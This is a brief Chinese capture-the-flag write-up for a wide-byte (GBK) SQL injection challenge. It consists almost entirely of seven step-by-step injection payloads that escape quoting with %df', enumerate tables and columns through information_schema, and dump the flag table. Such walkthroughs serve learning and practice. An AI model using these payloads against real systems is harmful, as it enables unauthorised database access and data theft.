http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
题解:
ctf4表里有个假flag
1、
id=1%df' and 1=2 %23 2、
id=1%df' order by 2 %23 3、
id=1%df' and 1=2 union select 1,2 %23 4、
id=1%df' and 1=2 union select 1,database() %23 5、
id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.TABLES where table_schema=0x7361652d6368696e616c6f766572 %23 6、
id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.COLUMNS where table_name=0x67626b73716c69 %23 7、
id=1%df' and 1=2 union select 1,flag from gbksqli %23
京公网安备 11010502036488号